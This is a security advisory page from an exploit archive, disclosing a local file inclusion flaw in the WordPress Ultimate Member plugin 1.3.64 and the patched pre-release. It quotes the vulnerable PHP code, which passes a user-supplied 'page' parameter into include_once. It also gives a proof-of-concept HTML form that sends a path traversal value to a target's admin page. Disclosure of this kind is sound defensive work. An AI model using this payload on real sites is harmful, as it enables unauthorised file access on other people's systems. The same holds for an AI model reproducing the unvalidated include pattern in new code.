what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Ultimate Member 1.3.64 Local File Inclusion

WordPress Ultimate Member 1.3.64 Local File Inclusion
Posted Jul 10, 2016
Authored by Burak Kelebek

WordPress Ultimate Member plugin version 1.3.64 suffers from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
SHA-256 | 317f09b9e2322d31fa052a7f6ae6448cd8a6fa3943cd7d5493b7a4e3aaf79a11

WordPress Ultimate Member 1.3.64 Local File Inclusion

Change Mirror Download
------------------------------------------------------------------------

Ultimate Member Local File Inclusion vulnerability

------------------------------------------------------------------------

Burak Kelebek, July 2016



------------------------------------------------------------------------

Abstract

------------------------------------------------------------------------

It was discovered that Ultimate Member is vulnerable to PHP File

Inclusion. An authenticated attacker can exploit this issue to

compromise WordPress, for example by retrieving sensitive data from

local PHP files.



------------------------------------------------------------------------

Tested versions

------------------------------------------------------------------------

This issue was successfully tested on the Ultimate Member WordPress

plugin version 1.3.64.



------------------------------------------------------------------------

Fix

------------------------------------------------------------------------

There is a fix available in Pre-released version: pre-v1.3.65.10. After

the fix is applied user input is no more used when including local files

in WordPress.



------------------------------------------------------------------------

Details

------------------------------------------------------------------------

The vulnerability occurs due to the use of user-supplied input in the 'page' parameter without proper validation.

The code first checks if 'ultimatemember-' exists in page parameter supplied by user. If it exists it deletes 'ultimatemember-' and assigns user input to the template parameter. Lastly it inserts user input in the PHP function include_once.

ultimate-member/admin/core/um-admin-dashboard.php:

$page = $_REQUEST['page'];
[..]
else if ( strstr( $page, 'ultimatemember-' ) ) {

$template = str_replace('ultimatemember-','',$page);
$file = um_path . 'admin/templates/welcome/'. $template . '.php';

if ( file_exists( $file ) ){
include_once um_path . 'admin/templates/welcome/'. $template . '.php';
}

}



Proof of concept

Proof of Concept below simply opens a file in the temp folder of WordPress.

<html>
<body>
<form action="http://<target>/wp-admin/admin.php?page=ultimatemember" method="POST">
<input type="hidden" name="page" value="ultimatemember-../../../../../uploads/ultimatemember/temp/dZm2Sr1IbnIy4Ikn3FbWdMlOh2wCzDu3KunD4tIk/stream_photo_697d3db4eba7e7254670210e3c095022_5779a47985512" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Login or Register to add favorites

File Archive:

October 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    0 Files
  • 2
    Oct 2nd
    22 Files
  • 3
    Oct 3rd
    19 Files
  • 4
    Oct 4th
    16 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close